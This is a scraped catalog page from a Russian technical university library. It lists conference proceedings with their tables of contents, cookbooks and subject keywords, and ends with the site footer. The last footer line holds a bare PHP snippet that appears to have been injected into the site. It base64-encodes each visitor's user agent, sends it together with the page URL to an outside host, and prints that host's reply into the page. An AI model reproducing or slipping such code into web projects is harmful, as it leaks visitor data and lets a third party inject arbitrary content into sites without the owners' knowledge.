  • Маджар, П. Д. Совершенствование системы отбора персонала при приеме на работу в современную организацию / П. Д. Маджар. - с.132-158
    Кл. слова: ОТБОР ПЕРСОНАЛА, ПРИЕМ НА РАБОТУ
  • Масалыкина, А. В. Сравнительная характеристика показателей качества пельменей, выпускаемых омскими производителями / А. В. Масалыкина, А. С. Семенова. - с.159-188
    Кл. слова: ПЕЛЬМЕНИ, КАЧЕСТВО ПРОДУКЦИИ
  • Мельникова, К. Г. Юридическое образование в России: исторические и качественные аспекты / К. Г. Мельникова. - с.189-225
    Кл. слова: ОБРАЗОВАНИЕ ЮРИДИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
15. 
Чудеса в микроволновой печи [Текст] : рецепты и полез. советы для кулинара / сост. О. В. Крылова, 1994. - 286, [2] с.
16. 
Сборник материалов II Торгового форума Сибири [Текст] / Правительство Ом. обл., Координац. совет по торговле и потребит. рынку межрегионал. ассоц. "Сибирское соглашение", Ом. гос. ин-т сервиса, Рос. экон. ун-т им. Г. В. Плеханова, Ом. ин-т (фил.), Торгово-пром. палата Ом. обл., 2013. - 417 с.
Ключевые слова 
КОРПОРАТИВНОЕ -- УПРАВЛЕНИЕ -- СОЦИАЛЬНЫЙ -- АУДИТ -- КООПЕРАЦИЯ -- КЛАСТЕР -- КОРПОРАЦИЯ -- ЧЕЛОВЕЧЕСКИЙ -- ПОТЕНЦИАЛ -- КОММУНИКАЦИЯ -- БАНКОВСКИЙ -- МАРКЕТИНГ -- ПРОДАЖА -- КОНСОЛИДИРОВАННЫЙ -- БЮДЖЕТ -- КОРПОРАТИВНАЯ -- КУЛЬТУРА -- БИЗНЕС -- УДАЛЕННАЯ -- РОССИЯ -- ФИНАНСИРОВАНИЕ -- ПУШНОЙ -- ЭКОНОМИЧЕСКИЙ -- КРИЗИС -- ИННОВАЦИОННАЯ -- ЭКОНОМИКА -- ВНЕШНЕЭКОНОМИЧЕСКАЯ -- ДЕЯТЕЛЬНОСТЬ -- ОМСКАЯ -- ОБЛАСТЬ -- ИНВЕСТИЦИЯ -- ЛИЗИНГ -- ОТЧЕТНОСТЬ -- ОРГАНИЗАЦИЯ -- ВТО -- СЕЛЬСКИЙ -- ТУРИЗМ -- ФАНДРАЙЗИНГ -- ПРОСЬЮМЕРСТВО -- КАЧЕСТВО -- ЭКСПЕРТИЗА -- ЗАЩИТА -- ПРАВО -- ПОТРЕБИТЕЛЬ -- ПОТРЕБИТЕЛЬСКАЯ -- КООПЕРАЦИЯ -- УЧЕТНАЯ -- ПОЛИТИКА -- СЕРТИФИКАЦИЯ -- КВАЛИФИКАЦИЯ -- ВЫПУСКНИК -- ЯЗЫКОВАЯ -- КОМПЕТЕНЦИЯ -- ИМИТАЦИОННОЕ -- МОДЕЛИРОВАНИЕ -- СТИМУЛИРОВАНИЕ -- ТРУД -- ПЕРСОНАЛ -- КАДРЫ -- ЛИДЕР -- ПРОДАКТ -- ПЛЕЙСМЕНТ -- КРЕАТИВНЫЙ -- ИННОВАЦИОННЫЙ -- ТОВАР -- ИТ -- АУТСОРСИНГ -- БРЕНД -- РОЗНИЧНАЯ -- ТУРИСТИЧЕСКАЯ -- МЕРЧЕНДАЙЗИНГ -- ПЕРСОНАЛЬНЫЕ -- ДАННЫЕ -- НЕЙРОМАРКЕТИНГ -- КОНКУРЕНТОСПОСОБНОСТЬ -- ТОВАРНЫЙ -- АССОРТИМЕНТ -- EVENT -- ОПТОВАЯ -- СПОРТИВНЫЙ -- КОНКУРЕНЦИЯ -- ПИТАНИЕ -- ШКОЛА -- БОЛЬНИЦА -- БИОПРОДУКТ -- ПОДСЛАСТИТЕЛЬ -- ЦЕНА
Оглавление 
  • Пономарева, Т. М. Правовые условия формирования корпоративной культуры в сфере торговли / Т. М. Пономарева. - с.35-37
    Кл. слова: КУЛЬТУРА КОРПОРАТИВНАЯ, КУЛЬТУРА ТОРГОВЛИ
  • Худякова, О. Д. Безопасность сырья как основа качества алкогольной продукции / О. Д. Худякова. - с.129-131
    Кл. слова: ПРОДУКЦИЯ АЛКОГОЛЬНАЯ, БЕЗОПАСНОСТЬ СЫРЬЯ
  • Бураковская, Н. В. Инновационное направление в организации обслуживания на предприятиях индустрии питания / Н. В. Бураковская. - с.293-294
    Кл. слова: ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ, ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ
  • Бураковская, Н. В. Современные концепции и совершенствование организации обслуживания в школьных столовых / Н. В. Бураковская. - с.305-306
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ, СТОЛОВАЯ ШКОЛЬНАЯ
  • Есипова, М. С. Проектирование рецептуры творожно-растительного пудинга для школьного питания / М. С. Есипова, О. В. Пасько. - с.322-324
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Макарова, О. В. Исследование технологии ферментированного молочно-солодового продукта для питания школьников / О. В. Макарова. - с.341-344
    Кл. слова: ПРОДУКТ МОЛОЧНО-СОЛОДОВЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Пасько, О. В. Целевые научно-практические исследования по оценке состояния и решению проблем школьного питания в г. Омске / О. В. Пасько. - с.346-348
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Шадрин, М. А. Мониторинг организации питания столовой СОШ №105 г. Омска / М. А. Шадрин, М. С. Бурикова. - с.377-379
    Кл. слова: СТОЛОВАЯ ШКОЛЬНАЯ
  • Шадрин, М. А. Питание школьников в Омском регионе: проблемы, перспективы развития / М. А. Шадрин, Л. Г. Германская. - с.380-381
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Волкова, И. А. Стратегические приоритеты технического развития сельского хозяйства региона / И. А. Волкова. - с.394-399
    Кл. слова: СЕЛЬСКОЕ ХОЗЯЙСТВО - РЕГИОН
  • Авдейчикова, Е. В. Проблемы развития удалённой торговли в России / Е. В. Авдейчикова. - с.38-42
  • Баетова, Д. Р. Преимущества торгового финансирования / Д. Р. Баетова, Е. А. Дмитренко. - с.43-45
  • Безбородова, Т. М. Социальная ответственность государства и торгового бизнеса при использовании труда иностранных работников / Т. М. Безбородова. - с.45-49
  • Гончарова, О. В. Международные аспекты пушного бизнеса в первом десятилетии XXI века / О. В. Гончарова. - с.49-54
    Кл. слова: XXI В.
  • Горбунов, П. И. Конкурентное развитие региона на основе стратегического евразийского проекта "Омский Локомотив - М" / П. И. Горбунов, В. В. Лизунов. - с.54-59
  • Елкина, В. Н. Становление территориального бизнес-сообщества как фактор развития малого и среднего бизнеса в условиях инновационной экономики / В. Н. Елкина. - с.59-64
  • Кириллов, Ю. Г. Современное состояние, динамика и перспективы развития внешнеэкономической деятельности Омской области в условиях экономического кризиса / Ю. Г. Кириллов. - с.64-67
  • Коновалов, К. Л. Тезаурус как системная информация для стратегического анализа и развития предпринимательства / К. Л. Коновалов. - с.67-70
  • Кривцов, А. И. Методика оценки эффективности инвестиций в лизинг на основе международной практики / А. И. Кривцов. - с.70-76
  • Лихтарова, О. В. Анализ международной практики правовых аспектов публикуемой отчетности организации / О. В. Лихтарова. - с.77-80
  • Метелев, К. А. Устойчивое развитие региона в условиях ВТО / К. А. Метелев. - с.81-85
  • Метелев, С. Е. Россия в ВТО: условия вступления и первые итоги / С. Е. Метелев, С. Н. Хоботова. - с.85-92
  • Свиридова, Е. А. Сельский туризм: европейский опыт и региональные перспективы / Е. А. Свиридова. - с.92-96
  • Скрипник, Т. В. Фандрайзинг - как это будет по-русски? / Т. В. Скрипник. - с.96-100
  • Шулбаева, М. Т. Просьюмерство как активный стиль жизни / М. Т. Шулбаева, П. Г. Боргояков, К. Л. Коновалов. - с.101-102
    Кл. слова: ПОКУПАТЕЛЬ
  • Болотова, С. С. Требования к качеству и безопасности средств по уходу за волосами / С. С. Болотова. - с.103-105
  • Данилова, Н. В. Качество куриных яиц на потребительском рынке г. Омска / Н. В. Данилова. - с.105-110
  • Королева, Ю. Е. Оценка качества шампуней, реализуемых на Омском потребительском рынке / Ю. Е. Королева. - с.110-113
    Кл. слова: РЫНОК
  • Королева, Ю. Е. Контрафактные и фальсифицированные товары как угроза безопасности на потребительском рынке / Ю. Е. Королева, Н. М. Катаева. - с.113-116
  • Королькова, Л. В. Качество товаров и потребительская экспертиза / Л. В. Королькова. - с.116-119
  • Плохотиков, С. И. К вопросу об экспертизе качества сложных электробытовых товаров / С. И. Плохотиков, А. А. Степанов, О. В. Рогова. - с.119-121
  • Семочкин, А. В. / А. В. Семочкин, Е. В. Корниенко. - с.122-124
  • Судакова, И. К. Исследование безопасности отделочных материалов на поливинилхлоридной основе / И. К. Судакова, Т. В. Котова. - с.124-126
  • Тимохина, Г. С. Соблюдение прав потребителей как основа формирования потребительской лояльности / Г. С. Тимохина. - с.126-129
  • Худякова, О. Д. Безопасность сырья как основа качества алкогольной продукции / О. Д. Худякова. - с.129-131
  • Исаев, А. В. Потребительская кооперация Омской области: в содружестве с властью - ради благополучия селян / А. В. Исаев. - с.132-134
  • Польский, В. С. Пути и направления инновационного развития потребительской кооперации на основе проблемно-задачного и системного подходов / В. С. Польский. - с.134-138
  • Иванов, К. К. Инвестиции как основной инструмент долгосрочного планирования / К. К. Иванов, С. С. Мельникова. - с.139-140
  • Миерманова, С. Т. Учетная политика организации в целях бухгалтерского управленческого учета / С. Т. Миерманова. - с.141-142
  • Романенко, Е. В. Особенности развития динамических способностей малого и среднего предпринимательства в сфере торговли Омского региона / Е. В. Романенко. - с.143-147
  • Федотенко, С. А. Особенности осуществления предпринимательской деятельности без образования юридического лица / С. А. Федотенко, Т. А. Чижикова. - с.147-149
  • Черепанова, И. В. Анализ и перспективы развития лицензионного законодательства Российской Федерации / И. В. Черепанова. - с.149-154
  • Бабурина, Т. Н. Гармония образовательных традиций европейских наций как принцип европейского пространства высшего образования / Т. Н. Бабурина. - с.155-157
  • Богданов, А. Н. Формирование фондов оценочных средств как условие реализации ФГОС при профессиональном обучении поваров / А. Н. Богданов, Г. Ф. Авдеева. - с.157-159
  • Власенко, О. В. Реализация принципов в социальной ответственности ВУЗа как условие интеграции в международное образовательное пространство (на примере Омского института (филиала) РГТЭУ) / О. В. Власенко. - с.159-164
  • Гурбо, Н. М. Сертификация профессиональных квалификаций выпускников в региональной системе профессионального образования / Н. М. Гурбо, М. М. Амренова. - с.164-166
  • Забудский, Г. Г. О подготовке специалистов торгово-экономической сферы по методам оптимизации / Г. Г. Забудский. - с.166-168
  • Климова, Э. Н. Коммуникативно-гуманистическая парадигма как основа подготовки специалистов сферы услуг / Э. Н. Климова, А. Н. Аршинова. - с.169-171
  • Кораблева, А. А. Отраслевой и человеческий потенциал в основе экономической безопасности региона / А. А. Кораблева. - с.171-175
  • Куламихина, И. В. Языковая компетенция, как фактор востребованности выпускника / И. В. Куламихина. - с.175-178
  • Мещеряков, В. А. Обучение студентов имитационному моделированию систем массового обслуживания в MATLAB / В. А. Мещеряков, В. П. Денисов, Л. А. Денисова. - с.179-181
  • Сватков, Б. С. Роль профориентации учащихся общеобразовательных школ в подготовке кадров для торговой отрасли Омской области / Б. С. Сватков. - с.181-184
  • Тарасова, Т. Н. Мотивация трудовой деятельности персонала микропредприятий индустрии туризма / Т. Н. Тарасова. - с.184-186
  • Хайрулина, Л. Р. Проблемы стимулирования труда персонала магазинов ООО "Компания Холидей" Омский филиал / Л. Р. Хайрулина. - с.186-189
  • Цыганова, О. А. Взаимодействие вузов и работодателей как механизм повышения качества подготовки молодых специалистов / О. А. Цыганова. - с.189-191
  • Шиповалов, А. Г. Качественные параметры кадрового обеспечения деятельности предприятий потребительского рынка / А. Г. Шиповалов. - с.191-194
  • Шкурко, О. В. Вузовская подготовка лидеров торговых предприятий: проблемы и перспективы / О. В. Шкурко. - с.194-196
  • Архипов, А. Е. Специфика маркетинга услуг: теоретический аспект / А. Е. Архипов, К. А. Лиханов. - с.197-199
  • Архипов, А. Е. Маркетинговые аспекты обеспечения инвестиционной привлекательности регионального туризма / А. Е. Архипов, И. Ю. Севрюков. - с.199-202
  • Бургат, В. В. Продакт плейсмент - современная технология маркетинговых коммуникаций / В. В. Бургат. - с.202-205
  • Вайнер, А. С. Особенности развития малого предпринимательства в сфере потребительских услуг / А. С. Вайнер. - с.206-209
  • Горшков, М. В. Средства электронной коммуникации в прямом маркетинге / М. В. Горшков. - с.209-213
  • Зеркалий, Н. Г. Креативный маркетинг как новая технология для потребительского рынка / Н. Г. Зеркалий. - с.217-221
  • Коваленко, Е. В. Маркетинговые стратегии на этапах жизненного цикла предприятия / Е. В. Коваленко, А. А. Рыбак. - с.224-228
  • Козлова, О. А. Возможности обучения потребителей на рынке инновационных товаров / О. А. Козлова, О. С. Иванова. - с.228-232
  • Медведева, Н. В. ИТ - аутсорсинг для торговых предприятий: теория и практика / Н. В. Медведева. - с.232-233
  • Нижальская, Н. И. Маркетинговый подход к управлению деятельностью предприятий торговли / Н. И. Нижальская, В. Д. Нижальская. - с.234-236
  • Нюренбергер, Л. Б. Современные подходы к реализации маркетинговых коммуникаций коммерческой организации / Л. Б. Нюренбергер, А. В. Курнявкин. - с.236-238
  • Нюренбергер, Л. Б. Корпоративная культура компании как внутренний компонент коммуникаций / Л. Б. Нюренбергер, А. А. Лаптев. - с.238-240
  • Нюренбергер, Л. Б. Управление брендом торгово-развлекательного комплекса / Л. Б. Нюренбергер, Е. Ю. Пятова. - с.241-243
  • Орехов, И. В. Интернет-магазин услуг по аутсорингу ITRUST. Оптимизация бизнес-процессов с целью повышения эффективности и прозрачности взаимоотношений между заказчиками и подрядчиками / И. В. Орехов. - с.243-244
  • Пятова, Е. Ю. Новая парадигма разработки комплекса маркетинговых коммуникаций / Е. Ю. Пятова. - с.249-250
  • Реброва, Н. П. Анализ оборота розничной торговли Омской области за январь - сентябрь 2010 - 2012 годов / Н. П. Реброва, В. М. Седельников. - с.251-254
  • Седова, В. М. Современные тенденции развития рынка туристских услуг / В. М. Седова, А. А. Кучковский. - с.254-258
  • Сухостав, Е. В. Разработка планограммы как ключевого инструмента мерчендайзинга / Е. В. Сухостав. - с.258-260
  • Таминдаров, Р. Т. Защита персональных данных / Р. Т. Таминдаров. - с.260-262
  • Таскаев, Е. Н. Методические основы оценки маркетинговой среды рынка услуг / Е. Н. Таскаев, М. С. Чернова. - с.262-266
  • Хайрулина, Л. Р. Нейромаркетинг как инструмент изучения поведения потребителей / Л. Р. Хайрулина. - с.266-268
  • Хайруллина, М. В. Факторы конкурентоспособности торговых организаций / М. В. Хайруллина, М. А. Нюренбергер. - с.269-272
  • Шарипова, Н. А. Использование event-маркетинга для привлечения клиентов / Н. А. Шарипова. - с.272-274
  • Швец, В. В. Особенности формирования товарного ассортимента в оптовой торговле / В. В. Швец, Н. В. Козырев. - с.274-275
  • Шереметьев, Н. К. Аспекты коммуникационной политики спортивного маркетинга / Н. К. Шереметьев. - с.276-281
  • Али-Аскяри, С. А. Современное состояние и перспективы интеграции форм хозяйствования на региональном рынке потребительских товаров / С. А. Али-Аскяри, В. М. Шкиренко. - с.282-287
  • Али-Аскяри, С. А. Особенности управления ресурсным потенциалом торговых организаций в условиях интеграции / С. А. Али-Аскяри, Х. З. Максудов. - с.287-289
  • Сватков, Б. С. Актуальность информационных технологий, для развития торговли на примере базы "Торговый Лоцман" / Б. С. Сватков. - с.289-291
  • Шкуренко, В. В. Стратегия взаимодействия местных сетей с локальными производителями. Проблемы и перспективы / В. В. Шкуренко. - с.291-292
  • Гурман, В. И. Подходы к оценке инвестиционных проектов для байкальского региона / В. И. Гурман, И. Р. Либенсон, Д. М. Скитневский. - с.297-301
  • Бакаева, В. В. Методический подход к оценке уровня развития торговли региона (города) / В. В. Бакаева, Н. В. Курушина. - с.389-393
  • Волкова, И. А. Стратегические приоритеты технологического развития сельского хозяйства региона / И. А. Волкова. - с.394-399
  • Кычанов, Б. И. Анализ динамики развития розничной торговли в омском регионе / Б. И. Кычанов. - с.399-401
  • Шайтанова, Л. М. Исследование динамики покупной цены товара как одного из параметров развития потребительского рынка / Л. М. Шайтанова, Л. Н. Гончаренко. - с.408-411
17. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
18. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
19. 
Сладкий сюрприз [Текст], 1998. - 333 с. [10] вкл. цв. л. с.
Держатели документа (Информация об экземплярах) 
20. 
Уоррен Дж. Шотландская кухня [Текст] / Дж. Уоррен ; авт. предисл. В. В. Похлёбкин, 1983. - 73 с.
Держатели документа (Информация об экземплярах) 
21. 
Абатуров, Павел Васильевич. Сладкие блюда. Напитки [Текст] / П. В. Абатуров, Н. П. Цыпленков, 1958. - 136 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3021 - 17.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.51 с.22 запросов, 0.85c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;